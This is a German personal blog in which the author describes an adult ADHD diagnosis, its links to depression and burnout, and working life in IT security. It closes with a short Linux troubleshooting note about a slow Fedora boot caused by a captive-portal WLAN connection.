Nun hatte ich schon drei Testergebnisse in der Hand, meine Zeugnisse sowie einen Bericht meiner Mutter angefordert, in der sie ihr Erleben meiner Kindheit beschrieb und reichte alles dort ein. Mein erster Termin bei dem Doc war relativ kurz. Ich erzählte, was mich zu ihm führte und welche Beobachtungen mich zu meinem Verdacht brachten, während er die Testergebnisse und die anderen Unterlagen überflog. Nach nur wenigen Minuten unterbrach er mich, ich brauche nicht weiterreden, das sei schon ein ziemlich eindeutiger Fall von ADHS und da müsse man (in Richtung meines bisherigen Psychiaters gesehen) schon mehr als beide Augen zugekniffen haben, um keinen entsprechenden Verdacht zu haben. Ich bekam Medikamente, die ich ausprobieren sollte und wurde für einen Monat zum Laborkaninchen in begrenzter Eigenregie. Beim nächsten Besuch bekam ich den selben Wirkstoff, allerdings in der für Erwachsene zugelssenen retardierten Form und auf Kassenrezept.

Das Thema Depressionen und ADHS könnte laut dem neuen Psychiater durchaus stark miteinander verknüpft sein. Wenn die Psyche permanent durch auf sie einprasselnde Eindrücke, die nicht intuitiv verarbeitet werden können, sondern immer volle Konzentration erfordern, überlastet wird, kann sie mit depressiven Symptomen reagieren. Das bewirkt schlussendlich, dass man sich diesen Eindrücken nicht mehr (oder nicht mehr so stark) aussetzt. Allerdings kommen durch so einen Rückzug auch neue Stressauslöser wie Selbstzweifel, Zukunftsängste oder Einsamkeit hinzu, die wieder die Depression verstärken. Mit Sicherheit ist damit ADHS zwar nicht der einzige Faktor, der meine Depressionen ausgelöst hat, aber einer der wichtigsten.

Leben nach der Diagnose

after diagnosis

Durch die Diagnose hat sich in meinem Leben einiges geändert. Nicht einmal so sehr durch die Medikamente, auch wenn mir diese aktuell erlauben, mich den ganzen Tag auf meine Arbeit zu konzentrieren und andere Dinge besser auszublenden. Primär haben bei mir jedoch viele Denkprozesse eingesetzt, die ohne die Diagnose nur schwer oder gar nicht möglich gewesen wären.

So ist es alleine schon eine Erleichterung, durch diese Diagnose viele Dinge zu akzeptieren, die mich ausmachen. Sprunghafte Gedanken, wieso ticke ich da so anders als die meisten anderen? ADHS! Wieso kann ich nicht lange in einer Position sitzen und muss mich ständig bewegen, weil ich sonst das Gefühl habe, zu platzen? ADHS! Wieso kann ich mich auf Dinge, die mir Spaß machen und für die ich brenne, konzentrieren, aber auf andere nicht? Wieso sträubt sich mein Gehirn gegen Ordnung und sich wiederholende monotone Prozesse? ADHS! Wieso schlafe ich bei Frontalbeschallung (Schulungen, Unterricht, Konferenzen) ein, wenn ich mich nicht irgendwie ablenken kann oder mich das Thema wirklich extrem interessiert? ADHS! Ich lerne, dass ich mich nicht selber für solche Dinge hassen muss. Dass ich mich nicht dafür schämen muss, dass ich so bin. Dass ich es auch nicht ändern kann, selbst wenn ich will. Dass ich nicht faul bin, weil ich Dinge nicht schaffe, die vom Ding her easy sind, bis ich eine Deadline auf mich zurollen sehe und der entstehende Stress mich erst handlungsfähig macht. Ich muss mir keine Vorwürfe machen, wenn ich an unpassenden Stellen über etwas lache, das jemand gar nicht als Witz gemeint hat. Und ich habe das Recht, meinem Bedürfnis nach Ruhe und Rückzug nachzugehen, auch wenn ich erst zehn Minuten unter Leuten bin, dadurch aber schon komplett überlastet bin.

Bei einigen Dingen (Konzentrationsfähigkeit, Ablenkungen in gewissem Rahmen ausblenden) helfen die Tabletten sehr. Und während sie bei vielen Menschen, die sie gerade im Studium illegal als Aufputsch- bzw. Konzentrationssteigerungsmittel nehmen eine sehr direkt wahrnehmbare Wirkung zu haben scheinen, merke ich davon tatsächlich eher wenig. Ich habe generell bei Medikamenten und Drogen, die in den Dopaminhaushalt eingreifen, beobachtet, dass diese kaum eine Wirkung bei mir haben. Auch in hohen Dosen beobachte ich bei mir nicht annähernd die Reaktion, die sie bei “neurotypischen” Personen haben. Generell beobachte ich bei mir selbst ein unglaublich geringes Suchtpotenzial. Ich habe in meinem Leben teils jahrelang stark geraucht, getrunken und gekifft. Und ich habe immer von einem Tag auf den anderen aufhören können, ohne dass ich großartige Entzugserscheinungen hatte. Am ehesten körperliche, gerade bei Alkohol, aber darüber hinaus hatte ich nie dieses Gefühl, wieder anfangen zu müssen oder den Entzug (sofern spürbar) abzubrechen. Es gab selten ein “ich brauche das jetzt”-Gefühl. Da ADHS nach aktueller Erkenntnis mit einen Dopaminmangel im Hirn einhergeht, verschiedene Drogen Dopaminausschüttung veranlassen und diese bei mir möglicherweise gestört ist, könnte dies ein möglicher Erklärungsansatz sein. Da es aber (Stand heute) schwierig bis unmöglich ist, einen Dopaminmangel direkt nachzuweisen, bleibt es eine Theorie, mit der ich aber ganz gut leben kann.

Kurioserweise könnte ein Dopaminmangel im Hirn, der indirekt meine Depressionen durch ADHS-typische Überlastung begünstigt hat, auch erklären, wieso ich die Antidepressiva nicht vertragen habe. Diese erhöhen auf verschiedenen Wegen auch die Konzentration anderer Neurotransmitter im Hirn, unter anderem Serotonin. Die Medikamente, die ich bekam, waren primär SSRIs, also selektive Serotonin-Wiederaufnahmehemmer. Wenn nun mein Serotoninspiegel ganz normal war (auch hier: Ein Nachweis ist im lebenden Hirngewebe schwierig) reagiert der Körper auf eine Erhöhung der Pegel mit Vergiftungserscheinungen. Schwindel, Übelkeit, Schweißausbrüche, Gleichgewichtsstörungen, Koordinationsstörungen, Herzrasen und Tinnitus waren meine Reaktionen auf nahezu jedes Medikament, das den Serotoninspiegel beeinflusst hat, bei manchen ausgeprägter und bei manchen weniger, aber generell immer die selbe Reaktion. Die Ärzte taten es als “Das sind normale Gewöhnungserscheinungen während des Einschleichens der Medikamente, da müssen Sie durch” ab. Die Symptome waren allerdings auch nach Monaten noch dieselben, während die erhoffte Wirkung ausblieb.

Generell gesprochen bin ich unglaublich froh, den Weg der ADHS-Diagnostik beschritten zu haben und mit einer entsprechenden Diagnose herausgekommen zu sein. Auch wenn viele Frage noch offen sind und ich erst einmal lernen muss, mit den Implikationen bestmöglich zu leben, habe ich alleine durch das Wissen, was warum so ist, wie es ist, ein mächtiges Werkzeug an der Hand. Ein Werkzeug, mit dem ich Dinge verändern kann, die mich kaputt machen und mit dem ich andere Dinge ausfindig machen kann, die mich beeinflussen, die ich aber nicht ändern kann. So kann ich gezielt nach Wegen suchen, meine durch ADHS entstandenen Einschränkungen und ungesunden Verhaltensweisen Stück für Stück zu ändern.

ADHS wird mich mein Leben lang begleiten. Die Depressionen vielleicht auch. Aber beides kann ich soweit in den Griff bekommen, dass ich damit leben und die positiven Aspekte (zumindest bei ADHS) für mich nutzen kann.

Gedanken und Erkenntnisse

insights

Arbeitstechnisches / Kommunikation

Ein Freund fragte mich kurz nach Veröffentlichung dieser Rubrik, ob ich es für eine gute Idee halte, derartige Informationen über mich öffentlich verfügbar zu machen. Auf Rückfrage erklärte er, ich mache mich dadurch zum einen angreifbar, zum anderen senke ich aber auch meinen Wert am Arbeitsmarkt bzw. gebe möglichen zukünftigen Arbeitgebern Informationen an die Hand, aufgrund derer sie mich nicht einstellen könnten.

Ansich sind das nachvollziehbare Gedanken. Natürlich könnte jemand Informationen, die ich hier über mich preisgebe, gegen mich verwenden. Theoretisch jedenfalls. Praktisch würde das vermutlich nur gelingen, wenn ich mit mir und meinem Zustand im Unreinen wäre. Bin ich allerdings nicht. :) Womit soll man mir schaden wollen? “Ich sag Deinem Arbeitgeber, dass Du krank bist”? Weiß der schon seit Jahren und unterstützt mich auf allen Ebenen. Meine Familie ebenso. Auch der Freundeskreis weiß Bescheid. Direkt angreifbar bin ich durch das Ganze auch nicht, sonst hätte ich vermutlich schon größte Schwierigkeiten gehabt, über das Ganze zu schreiben.

Und die Sache mit zukünftigen Arbeitgebern (die das hier potenziell auch lesen)? Das ist für mich die unkritischste bzw. einfachste Facette der Fragestellung. Ich handhabe das als automatisches Aussieben. Wenn ein potenzieller zukünftiger Arbeitgeber von meiner Krankheit erfährt und daraufhin kein Bewerbungsgespräch anbietet: So be it, das wäre tatsächlich auch kein Arbeitgeber, mit dem ich glücklich werden würde. Meinerseits verstehe ich meine Offenheit dem Thema gegenüber auch als Fairness denen gegenüber, die mit mir zusammenarbeiten wollen, denn so wissen sie, was auf sie zukommen würde. So haben beide Seiten die Chance, die Karten offen auf den Tisch zu legen und auf Augenhöhe zu verhandeln. Wenn dadurch direkt ein hoher Prozentsatz an Angeboten wegfallen würde, soll mir das recht sein. Gespräche in dieser Richtung wären Zeitverschwendung für beide Seiten - der verbleibende Rest ist der, für den ich mich interessiere.

Gründe für die Offenheit

Auch diese Frage höre ich von Zeit zu Zeit. Die Frage, wieso ich sowohl dem Arbeitgeber als auch der Öffentlichkeit gegenüber offen über ADHS und Depressionen rede. Auch da kommt oft das Argument “Angreifbarkeit” und “das geht doch keinen was an”.

Spätestens bei letzterem Punkt möchte ich widersprechen: mental issues gehen uns als Gesellschaft sehr wohl etwas an. Dass diese traditionell kleingeredet, ganz verschwiegen oder mit Alkohol seitens der Betroffenen im stillen Kämmerlein behoben werden ist Teil eines ganz massiven Problems. Wenn ich in bestimmten Kreisen herumfrage, mit denen ich viel zu tun habe, und quasi von jeder zweiten Person zu hören bekomme “Ja, mit Depressionen/Burnout hatte ich auch schon selber zu tun”, geht das jeden etwas an. Auch Menschen mit ADHS-Verdacht oder -Diagnosen, die erst im Erwachsenenalter zum Thema wurden, kenne ich unglaublich viele - vollkommen unabhängig von meiner eigenen Diagnose und den Kreisen, die das gerade zieht.

Genauer gesagt haben wir zwei Probleme, wegen denen ich mit der Thematik nicht stumm bleibe: Offenbar begünstigt unsere aktuelle Gesellschaft die Entstehung von psychischen Erkrankungen, außerdem werden diese meist totgeschwiegen (“Was sollen denn die anderen denken?!) und die Symptome werden im Zweifel nur noch schlimmer. Wir brauchen mehr Psychologen, die sich auskennen und auch kurz- und mittelfristige Termine anbieten können. Wir brauchen mehr Forschung zu den Ursachen. Wir brauchen mehr Sichtbarkeit, Rückhalt und Verständnis in der Bevölkerung und bei Arbeitgebern.

Gerade ADHS ist keine einseitige Medaille. Sicher, einige Aspekte des Lebens werden dadurch erschwert und wenn es durch den Überlast-Marathon zu weiteren Erkrankungen wie Depressionen kommt, ist das kaum etwas, aus dem man etwas Positives ziehen kann. Auf der anderen Seite erlebe ich ADHS-Betroffene als hyperkreativ, unglaublich leistungsfähig wenn man ihnen Aufgaben gibt, die sie interessieren und oft auch aufopfernd hilfsbereit. Wenn Gesellschaft und Arbeitgeber es schaffen, dieses Potenzial zu nutzen, ohne die negativen Aspekte zu befeuern, hätten alle etwas davon.

Von toten Linien und roten Fäden

Für die meisten Menschen sind Deadlines kein großes Problem. Man kümmert sich rechtzeitig und hat die Deadline im Blick, kann also dafür sorgen, dass Aufgaben rechtzeitig vorher beendet sind, um die zeitlichen Vorgaben einzuhalten.

Für mich sind Deadlines eine besondere Art von Endgegnern. Sie tauchen vollkommen überraschend auf und schlagen gnadenlos zu. Sicher, der eine oder andere wird jetzt vollkommen zu Recht anmerken, dass die Deadline ja vorher kommuniziert, angekündigt und bestimmt auch im Kalender vermerkt war. Kurioserweise ist mir das auch jederzeit bewusst, es ist nicht so, dass ich von der Deadline nichts weiß. Es ist nur so, dass sie halt in der Zukunft liegt, und die ist etwas, das mein Bewusstsein nicht als unaufhörlich auf mich zurollende Entität wahrnimmt.

Das Problem ist, dass viele ADHS-Betroffene ein fehlendes Gefühl für dieses Ding namens “Zeit” haben. Zeit ist schon für Physiker etwas, das man schwer beschreiben kann, denn es lässt sich zwar messen, aber nicht so richtig fassen. Zeit vergeht unterschiedlich schnell für Objekte, die sich unterschiedlich schnell bewegen - aber eigentlich nur aus der Perspektive des jeweils anderen bzw. eines Beobachters. Die Zeit als Komponente der Raumzeit ist ein relativ junges Konzept. Und dass Zeit einfach das Wahrnehmen des Bedürfnisses aller Dinge ist, sich in Richtung maximaler Entropie zu entwickeln… naja, das ist schon arg abstrakt. Da ist es schon praktisch, dass die meisten Menschen ein Gefühl für Zeit entwickelt haben und dass wir über Messgeräte verfügen, die den Ablauf der Zeit wenigstens im selben Bezugsrahmen halbwegs genau bestimmen können.

Irgendwann Anfang 2024 las ich das erste mal davon, dass meine Mitleidenden offenbar primär im “Jetzt” leben. Planung ist schwierig und auch Erinnerungen einem bestimmten Zeitpunkt zuzuordnen fällt schwer. Wie so oft erkannte ich mich in dieser Beschreibung auffällig gut wieder. Frag’ mich, was ich am Vorabend gegessen habe: Ich habe größte Schwierigkeiten, die Frage zuverlässig zu beantworten. Nicht, weil ich nicht wüsste, was ich so in letzter Zeit zu mir genommen habe, in der Regel merke ich mir das schon. Aber ich kann nicht zuordnen, ob es nun die Puffreis-Cracker waren, die Nudelsuppe oder der Müsliriegel. In den meisten Fällen kann ich so etwas nur anhand der Umstände rekonstruieren: Müsliriegel esse ich eher morgens oder mittags im Büro, Nudelsuppe mittags im Büro oder abends zu Hause, Reiscracker eher nur abends zu Hause. Und so habe ich schließlich eine ausreichend plausible Reihenfolge, dass ich behaupten kann: “Vermutlich Puffreis, glaube ich.”

In diesem Kontext fällt oft der Begriff “time blindness” und dieses Unvermögen, Zeit zuverlässig als konstant fließendes Konstrukt wahrzunehmen, sorgt nicht nur beim Erinnern der letzten Mahlzeiten für Ungemach. Auch Deadlines werden damit zum abstrakten Begriff, da sie erst dann als relevant wahrgenommen werden, wenn sie im “Jetzt” ankommen, oder zumindest beim Blick auf den Kalender der aktuellen Woche sichtbar werden. Bei mir persönlich ist es zudem so, dass ich, selbst wenn ich von einer Deadline weiß, die gerade noch mit vertretbarem Aufwand zu schaffen ist, dadurch in keinen Reaktionsmodus komme. Ich weiß, dass ich JETZT anfangen müsste, Dinge zu tun, aber der Impuls im Kopf, der darauf Taten folgen lassen sollte, liegt still in einer Ecke und döst vor sich hin. Warum das so ist? Vermutlich wie bei so vielen Dingen ein Dopaminmangel.

Das Spannende an Dopamin ist für mich, dass es, sobald ich eine Tätigkeit angefangen habe, offenbar in ausreichenden Mengen produziert wird. Habe ich diesen inneren Mt. Everest überwunden, der mich daran hindert, mit einer Tätigkeit zu beginnen, gehen mir die meisten Tätigkeiten leicht von der Hand. Oft verliere ich zwar nach einiger Zeit wieder die Konzentration oder das Interesse, aber das ist mit den richtigen Medikamenten ein lösbares Problem.

Der innere Mt. Everest ist für mich nur schwer zu bezwingen. Es gibt drei Möglichkeiten, wie ich es aktuell schaffe:

  1. Die Deadline steht vor der Tür und die Panik, es nicht zu schaffen, trägt mich über diesen Berg; meist folgt durchgehende Nachtarbeit, um es noch rechtzeitig zu schaffen.
  2. Medikamente helfen mir, den Berg etwas abzutragen, bevor ich ihn besteige. Klappt nicht immer, aber wenn, komme ich gut voran.
  3. Zeit. Gerade das Konstrukt, das mir solche Probleme macht, löst sie manchmal auch, denn irgendwann überkommt es mich doch und ich laufe einfach um den Berg herum. Bis das passiert können aber Wochen und Monate vergehen, daher ist das für Deadlines eher keine Lösung.

Bevor ich Medikamente bekam, vor meiner Diagnose, hatte ich keine Erklärung dafür, wieso ich nicht in der Lage war, Deadlines einzuplanen und zu berücksichtigen wie meine Kollegen. Wieso meine Hilfsmittel alle versagten und nur die kurz bestehende Deadline mich in einen Zustand brachte, der es mir mit massivem Stress und Schuldgefühlen erlaubte, die meisten Deadlines dennoch einzuhalten - zu Lasen meines Körpers und des seelischen Wohlbefindens. Das zieht sich wie eine rote Linie (man beachte meine geschickte Referenz auf den zweiten Teil der Headline) durch mein ganzes Leben, mal mehr, mal weniger intensiv. Heute weiß ich, dass das weder meine Schuld ist, noch dass ich mich dafür schämen muss. Ich habe zudem Werkzeuge in die Hand bekommen, mit denen ich diese Situation besser in den Griff bekomme.

ADHS & Depressionen

Ich habe lange überlegt, ob ich dem Thema Depressionen einen eigenen Bereich widme oder es unter ADHS eingliedere. Würde ich alle Facetten beleuchten wollen, gäbe es sicherlich genügend Inhalte, um eine eigene Rubrik damit zu füllen. Vermutlich würde auch mein Psychologe widersprechen, wenn ich die Depressionen hart mit ADHS verknüpfe, doch mein Gefühl sagt mir, dass in meinem Fall eine Vermischung sinnvoll ist.

Was haben also Depressionen (in meinem Fall) mit ADHS zu tun? Wie schon in Der Weg zur Diagnose angeteasert ist es für mich durchaus wahrscheinlich, dass mein undiagnostiziertes und damit unbehandeltes ADHS einer der Auslöser für Burnout und Depressionen im Erwachsenenalter war. Mein Kopf steht quasi immer unter Hochspannung. Das, was ich mein ganzes Leben lang als normal wahrgenommen habe, findet bei den meisten Menschen so gar nicht statt, wie ich in den Monaten nach der Diagnose lernen musste. Ständig wechselnde Interessen, Fokusrichtungen, Aufmerksamkeit? Fehlende Filter und Überforderung mit zu viel Input, den neurotypische Menschen einfach automatisch wegsortieren? Menschen zu “lesen” ist ein willentlicher Kraftakt? Ein Großteil der Menschheit wird das nicht ansatzweise nachvollziehen können.

Ich rede seit der Diagnose mit vielen neurodiversen Menschen, die ich bisher nicht einmal als ebenfalls betroffen wahrgenommen hatte. Ich frage auch Freunde, Bekannte und Kollegen, die eher im normalen Spektrum einzuordnen sind, wie sie Dinge wahrnehmen und handhaben. Und es zeichnet sich ein recht deutliches Bild ab: Viele der Menschen, die starke Anzeichen von ADHS zeigen, haben auch ihre Erfahrungen mit Burnout und Depressionen gemacht. Der Anteil der Menschen, die damit eher nichts zu tun hatten ist unter uns Eichhörnchen gefühlt deutlich höher.

In Der Weg zur Diagnose berichtete ich über meinen auf ADHS spezialisierten Psychiater, der diesbezüglich eine ganz klare Meinung hat, nämlich dass ADHS-Patienten durch ihre Besonderheit von Kindheit an unter einer erhöhten Belastung leiden. Die Fähigkeit, sich auf eine bestimmte Sache zu konzentrieren und diese Konzentration zu halten, ist bei diesen Menschen weniger stark ausgeprägt als bei Neurotypischen, wodurch sie alleine durch die auf “normale” Menschen ausgerichtete Gesellschaft unter psychischem Druck stehen. Das Verständnis der Gesellschaft für abweichende Verhaltensweisen oder für die Unfähigkeit, sich “normal” zu verhalten, ist sehr begrenzt vorhanden, um es vorsichtig auszudrücken. So kommt zusätzlich zu den erschwerten Bedingungen, die Eindrücke des Umfelds nicht effizient filtern zu können, auch noch zusätzlicher Druck durch die Menschen um einen herum dazu. Erwartungshaltungen, die man unbedingt erfüllen muss (und auch will), um irgendwie erfolgreich und konfliktarm durchs Leben zu kommen.

Für mich ist das eine wichtige Erkenntnis. Während meiner Ausbildung zum Fachinformatiker stolperte ich in meinen ersten Burnout. Die Ausbildung war keine große Herausforderung, die meisten der dort vermittelten Wissensbereiche beherrschte ich bereits mindestens grundlegend und musste nie viel lernen, um die teilweise komplexen Themengebiete zu verstehen. Das Problem hier war am ehesten, nicht vor Langeweile noch im Klassenzimmer zu sterben, um es salopp auszudrücken. Das eigentliche Problem war der Berufsalltag. Ich hatte schon relativ früh viele Aufgaben im IT-Betrieb meiner Ausbildungsfirma übernommen und versuchte mit den anderen Auszubildenden, die täglichen Anforderungen zu erfüllen und nebenbei noch die IT-Infrastruktur nicht nur am Laufen zu halten sondern auch weiterzuentwickeln. Diese war aus heutiger Sicht nicht überkomplex, allerdings hingen einige Anforderungen daran, in die man sich erst tief einarbeiten musste. Klingt cool, war es auch. Ich habe in dieser Zeit viel lernen dürfen, auch über meine eigenen Grenzen.

Was zum Problem wurde: Nicht klar kommunizierte Erwartungshaltungen, Routineaufgaben, Zwischenmenschliches.

Dass die Erwartungen meiner Vorgesetzten in einigen Fällen über das hinaus gingen, was bei mir vom Verständnis her ankam, wurde mir erst sehr viel später klar, als ich mit Freunden darüber redete. Denen war, als sie den Wortlaut einer Anforderung hörten, sofort klar, dass die Anforderung selbst oft nicht einmal das primäre Ziel definierte. Für mich selber stand der Wortlaut als solcher im Raum und ich führte ihn gewissenhaft aus, ohne zu realisieren, dass noch viel Ungesagtes drum herum ebenfalls umgesetzt werden sollte. Auch heute fällt es mir noch schwer, “zwischen den Zeilen” oder “über den Tellerrand hinaus” zu lesen. Die Erfahrungen im IT-Betrieb erlauben es mir zwar, in gewissem Rahmen zu extrapolieren, aber es kostet jede Menge Kraft.

Auch Routineaufgaben führten dazu, dass mich der Arbeitsalltag zunehmend belastete. Backup-Bänder wechseln, den globalen Spamfilter checken, alle Produktivsysteme auf korrekte Funktion checken, die Update-Meldungen der Hard- und Softwarehersteller auf kritische Sicherheitslücken prüfen, die sofort behoben werden müssen, Patchmanagement, etc… Alles sinnvolle und wichtige Aufgaben, aber: Routineaufgaben sind mein Erzfeind. Dinge, die sich immer wiederholen, die keine Abwechslung bieten, langweilen mich zu Tode und ich muss mich immer mehr zwingen, sie zu erledigen. Das Verständnis anderer Menschen dafür ist erwartungsgemäß gering und so stand ich zwischen den Stühlen: Entweder viel Energie darauf aufwenden, diese Aufgaben gewissenhaft zu erledigen oder mich dem Unmut meiner Vorgesetzten aussetzen, die vollkommen zu Recht auch auf die Erledigung dieser Aufgaben bestanden.

Zwischenmenschliche Probleme hatte ich schon immer. Dadurch, dass ich mich anders verhielt als der Rest der Kindergartenkinder, verbrachte ich ein zweites Jahr im Kindergarten - aufgrund sozialer Anpassungsprobleme. In der Schule war ich immer der Außenseiter, in den weiterführenden Schulen permanent Mobbing-Opfer. Erst mit Anfang 20 lernte ich Menschen kennen, die mich halbwegs so hinnahmen, wie ich war. Weird, sprunghaft, kreativ, aber irgendwie scheinbar auch interessant genug, um sich mit mir auseinander zu setzen. Doch das alles war Freizeit - im Beruf gab es genug Menschen, die mit meiner Art, Dinge anzugehen und mit Anderen zu reden, nicht umgehen konnten. Ich war zu diesem Zeitpunkt auf der anderen Seite auch nicht mehr bereit, meine Überzeugungen udn auch fachlichen Kompetenzen aufgrund solcher Befindlichkeiten dauernd kleinreden zu lassen und so krachte es zwischen einem meiner Vorgesetzten und mir teils gehörig; teilweise wurde es sogar ziemlich laut im Büro, was eigentlich gar nicht meine Art war. Aber die Nerven lagen zu diesem Zeitpunkt schon gehörig blank.

Dazu kamen der viel zu frühe Tod meines Vaters sowie eine sehr unschöne und emotional belastende Trennung von meiner damaligen Partnerin, die im selben Bürokomplex arbeitete wie ich. All das führte dazu, dass ich schließlich zum Arzt ging, weil ich nicht mehr arbeitsfähig war. Der diagnostizierte mir Burnout, schrieb mich für ein paar Wochen krank und legte mir nahe, Stress zu reduzieren und mir ggf. professionelle Hilfe zu suchen, wenn sich der Zustand nicht besserte.

Ich zog kurz darauf die Reißleine und kündigte, packte meine Siebensachen und zog zu einem guten Freund nach Berlin, der Stadt, die ich damals nicht ausstehen konnte. Aber ich konnte so zwei meiner drei großen Stresspunkte zurücklassen und erholte mich vorerst. Zwar stresste mich auch mein erster Berliner Job gehörig, doch ein paar Jahre hielt ich es aus, bis ich bei meinem jetzigen Arbeitgeber anheuerte.

Hier sprang ich erst einmal in eiskaltes Wasser. IT-Security, Pentesting… Ich wusste, worum es ungefähr ging, hatte ich doch schon als Jugendlicher das Internet auch auf kreative Weise genutzt und herausgefunden, wie man auch fremde Rechner und Server für sich nutzen kann. Ohne ins Detail zu gehen, ich war vielleicht ein besseres Scriptkiddie. Doch mein neuer Arbeitgeber hatte Vertrauen in mich und ich schätze, allzu blöd habe ich mich auch nicht angestellt. Doch nach einigen Jahren traten einige Ausfallerscheinungen bei mir auf, die ich nur allzu gut kannte. Prokrastination, Zeitmanagement-Probleme, Berichtsfaulheit (es fiel mir immer schwerer, Berichte zu schreiben oder später gar anzufangen). Eine ganze Weile kämpfte ich alleine dagegen an, weil ich Angst hatte, dass meine Vorgesetzten wie bisher bei allen anderen Arbeitgebern wenig Verständnis für solche Befindlichkeiten haben würden. Doch irgendwann konnte ich die Menge an Auffälligkeiten nicht mehr verbergen und wir führten viele Gespräche, in denen viel Verständnis und noch viel mehr Lösungsmöglichkeiten aufkamen.

Leider war es zu diesem Zeitpunkt bereits zu spät. Eigenständig konnte ich keine Kundentermine verabreden, keine Angebote schreiben, nicht selbstständig Arbeiten beim Kunden angehen. Mit anderen Kollegen, die mir Arbeitsaufgaben zuteilten, ging es noch eine Weile, doch hinterher die Ergebnisse aufzuschreiben fiel mir immer schwerer bis ich komplett blockiert war. Die Angst um den Arbeitsplatz und damit Sicherheit im eigenen Leben lähmte mich zusätzlich. So verschlechterte sich mein Zustand bis zu dem Punkt, an dem ich morgens nicht einmal mehr aus dem Bett kam. Die Angst, die bei meinem Arbeitgeber nicht berechtigt war, denn hier wurde vorbildlich reagiert und alles versucht, um mich wieder auf die Beine zu bekommen, stellte sich leider im privaten Bereich als nicht herbeiphantasiert heraus. Meine Wohngemeinschaft störte sich dermaßen an meinem Rückzug aus dem Alltagsleben, dass sie mir nahelegten, mir eine neue Wohnung zu suchen; sie seien mit mir überfordert. Leider (und die Folgen tun mir wirklich leid) war die gesamte WG an meinen Mietvertrag gebunden und so verloren auch meine Mitbewohner ungewollt ihre Bleibe, als ich schließlich auszog.

Kurz vor der Auflösung der WG hatte ich meine erste Erfahrung mit Tageskliniken und Therapie gemacht. Ich ließ mich für sechs Wochen in eine Tagesklinik in der Nähe einweisen, wo ich lernte, mit mir und meiner Umwelt achtsamer umzugehen. Am Ende der Zeit dort spiegelte eine der Mitarbeiterinnen mir, dass sie nicht verstehe, wieso ich eigentlich dort war - die meiste Zeit sei ich fröhlich, ausgelassen und in positiver Grundstimmung gewesen, habe Workshops für meine Gruppenmitglieder angeboten und überhaupt keinen depressiven Eindruck gemacht. Heute ahne ich, dass der Wechsel in eine neue Umgebung, neue Aufgaben und die Freiheit, meine Zeit dort in Teilen so zu gestalten, wie ich es brauchte, der ausschlaggebende Punkt waren. Raus aus der bisherigen Routine. Weg von Erwartungshaltungen. Leute, die Verständnis hatten. Und klare Erwartungshaltungen seitens der Betreuer.

Doch die Depressionen waren nicht vorbei, zogen sich noch jahrelang weiter hin und es wurde klar, dass auch der Tod meines Vaters, den ich nicht wirklich verarbeitet hatte und der viele offene Wunden zurückließ, ein weiterer großer Faktor war. Diese Thematik sowie meine Anpassungen an meine Umgebung, die mir überhaupt ein halbwegs “normales” Leben ermöglichen, aber ansich an die Substanz gehen, sind nun Grundlage für meinen nach langer Zeit ergatterte Therapieplatz. ADHS wird hier größtenteils als Faktor ausgeklammert, da mein Psychotherapeut nicht an einen grundlegenden Einfluss diesbezüglich glaubt. Doch für mich ist dieser jeden Tag besser sichtbar. ADHS ist Auslöser für viele Kompensations-Verhaltensweisen, die sich negativ auf meine Psyche auswirken. ADHS bedeutet permanente Belastung, da das Filtern meiner Umgebung und die Konzentration auf bestimmte Dinge jede Menge Energie kosten. Und ADHS ist die Ursache für viele meiner sozialen Ängste, die sich ebenfalls auf meine Psyche auswirken.

Knowledge Base (WIP)

kb

Manche Fehler findet man nur nach langer Suche. Die Lösung mitunter gar nicht.

Meine persönlichen Lösungen für verschiedene Problemstellungen möchte ich gerne mit der Allgemeinheit teilen, um anderen diesen steinigen Weg etwas zu erleichtern.

Ich unterscheide hierbei nicht zwischen vermeintlich selbstverständlichen “no-brainern” und Lösungen, die teils nächtelanges Bugfixing erforderten. Frei nach dem Motto “es gibt keine dummen Fragen” hoffe ich, dass sowohl Anfänger als auch Profis an dieser Stelle Inspiration erhalten können.

Unterabschnitte von Knowledge Base (WIP)

Unterabschnitte von Software

Unterabschnitte von Linux

Langsames_booten

Manchmal kommt es zu seltsamen Verhaltensweisen, deren Ursache sich nur schwer erahnen lässt. So auch mit dem Phänomen, dass mein Fedora 40 seit dem 1&1-Desaster ungefähr anderthalb bis zwei Minuten brauchte, um zu booten. Was war da los?

Fehlersuche

Mittels systemd-analyze critical-chain stellte sich der Dienst NetworkManager-wait-online.service als Übeltäter heraus, der fast eine Minute lang nichts tat und den Systemstart aufhielt.

Aber tat er wirklich nichts? Ein wenig Recherche brauchte zutage, dass dieser Service genau das tat, was der Name vermuten lässt. Er stellt die im NetworkManager (entweder über die integrierte GUI des Window Managers oder via nm-connection-editor) konfigurierten Netzwerkverbindungen her und überprüft, ob sie online sind. Offensichtlich nimmt er das wörtlich, eine Verbindung alleine reicht nicht aus, die Verbindung muss “nach draußen” kommunizieren können.

Wieso ist das ein Problem? Nun, ich habe drei Netzwerk-Interfaces konfiguriert. Zwei davon sind kabelgebundene Verbindungen zu meinem Switch (2.5G und 10G), die dritte ist eine WLAN-Verbindung. Letztere stellte sich als das Problemkind heraus. Ich hatte übergangsweise ja das WLAN des Nachbarn mitbenutzen dürfen, bis mein Internetanschluss wieder funktionierte. Die Gegenstelle war eine Fritzbox-Gastnetzwerk mit aktiviertem Captive Portal. Verband der NetworkManager sich nun mit dem Netzwerk, erwartete die Fritzbox einen Klick auf “okay” im Browser, der natürlich nicht kam. Die Verbindung wurde nicht freigegeben und der NetworkManager-wait-online-Dienst wartete vergeblich, bis er in ein Timeout lief.

Fehlerbehebung

Über den nm-connection-editor entfernte ich die sowieso nicht mehr benötigte WLAN-Verbindung zum Nachbarsnetz, startete neu - und siehe da, nach weniger als einer halben Minute begrüßte mich die GUI.

Hardware

Ich komme nicht darum herum, verschiedenste Hardware zu nutzen, die ggf. für meine Zwecke gar nicht vorgesehen oder angepasst ist. Häufig betrifft das Linux-Kompatibilität oder Unzulänglichkeiten in der vorgesehenen Konfiguration der Geräte. In dieser Rubrik gehe ich auf gerätespezifische Workarounds, Bugfixes oder einfach nicht auf den ersten Blick ersichtliche Lösungen ein.

Unterabschnitte von Hardware

Keychron Q6 Max und VIA unter Linux

Keychron stellt (aus meiner persönlichen Sicht) unglaublich schöne, hochwertige Keyboards her, die die tägliche Arbeit um ein angenehmes Tippgefühl sowie sinnvolle Funktionen ergänzen.

